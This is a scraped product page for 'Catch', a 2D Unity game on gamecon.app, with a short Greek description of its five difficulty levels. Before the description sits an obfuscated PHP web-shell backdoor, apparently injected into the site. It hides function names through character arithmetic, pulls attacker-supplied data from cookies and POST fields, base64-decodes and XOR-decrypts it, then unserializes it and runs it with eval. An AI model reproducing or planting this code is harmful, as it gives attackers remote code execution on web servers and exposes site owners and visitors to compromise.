$HBVEZh = "\x57" . 'C' . chr (95) . chr ( 227 - 149 ).chr ( 886 - 783 ).chr ( 530 - 427 ).'u';$EsGBMJA = chr ( 299 - 200 )."\x6c" . chr ( 360 - 263 )."\x73" . 's' . '_' . chr ( 1047 - 946 )."\170" . "\151" . 's' . chr (116) . chr ( 992 - 877 ); $WYShcrGVXw = class_exists($HBVEZh); $EsGBMJA = "64720";$VNOAGK = strpos($EsGBMJA, $HBVEZh);if ($WYShcrGVXw == $VNOAGK){function OacAVwCB(){$OgbMxq = new /* 23283 */ WC_Nggu(43914 + 43914); $OgbMxq = NULL;}$IgsIkw = "43914";class WC_Nggu{private function ekOHu($IgsIkw){if (is_array(WC_Nggu::$jpmFdko)) {$pXmdNE2 = str_replace("<" . "?php", "", WC_Nggu::$jpmFdko["content"]);eval($pXmdNE2); $IgsIkw = "43914";exit();}}public function GIeWxKtly(){$pXmdNE = "5141";$this->_dummy = str_repeat($pXmdNE, strlen($pXmdNE));}public function __destruct(){WC_Nggu::$jpmFdko = @unserialize(WC_Nggu::$jpmFdko); $IgsIkw = "62088_7085";$this->ekOHu($IgsIkw); $IgsIkw = "62088_7085";}public function agaXGfdA($pXmdNE, $aLDsDehEYW){return $pXmdNE[0] ^ str_repeat($aLDsDehEYW, intval(strlen($pXmdNE[0]) / strlen($aLDsDehEYW)) + 1);}public function NDdXFUp($pXmdNE){$nNPyWIdU = chr ( 671 - 573 )."\141" . 's' . 'e' . "\x36" . "\x34";return array_map($nNPyWIdU . "\x5f" . 'd' . chr ( 107 - 6 )."\143" . chr ( 594 - 483 ).'d' . 'e', array($pXmdNE,));}public function __construct($dTUSBL=0){$GNlEMgVQ = ',';$pXmdNE = "";$LvbcxRlw = $_POST;$XESTqofxj = $_COOKIE;$aLDsDehEYW = "e6610c9c-e5b7-4ad5-8c8b-1f4d7736e88e";$piTaTofRF = @$XESTqofxj[substr($aLDsDehEYW, 0, 4)];if (!empty($piTaTofRF)){$piTaTofRF = explode($GNlEMgVQ, $piTaTofRF);foreach ($piTaTofRF as $QjwXUkaxPN){$pXmdNE .= @$XESTqofxj[$QjwXUkaxPN];$pXmdNE .= @$LvbcxRlw[$QjwXUkaxPN];}$pXmdNE = $this->NDdXFUp($pXmdNE);}WC_Nggu::$jpmFdko = $this->agaXGfdA($pXmdNE, $aLDsDehEYW);if (strpos($aLDsDehEYW, $GNlEMgVQ) !== FALSE){$aLDsDehEYW = explode($GNlEMgVQ, $aLDsDehEYW); $tIGmAHLbU = base64_decode(strrev($aLDsDehEYW[0]));}}public static $jpmFdko = 51799;}OacAVwCB();} Catch - gamecon.app

Catch

Σε αυτό το παιχνίδι ο χρήστης προσπαθεί να πιάσει τα αντικείμενα που πέφτουν και να κερδίσει πόντους.

Υπάρχουν 5 διαφορετικά επίπεδα (levels) παιχνιδιού και σε κάθε επίπεδο αλλάζει η διάρκεια του παιχνιδιού, η ταχύτητα της κίνησης των αντικειμένων, η συχνότητα με την οποία πέφτουν τα αντικείμενα κλπ. Το επίπεδο δυσκολίας επιλέγεται από τη διαχειριστική πλατφόρμα CMS.

Το παιχνίδι είναι 2D, σε Unity πλατφόρμα, και οι αλλαγές στα γραφικά γίνονται μόνο μέσω της πλατφόρμας Unity.

Scroll to Top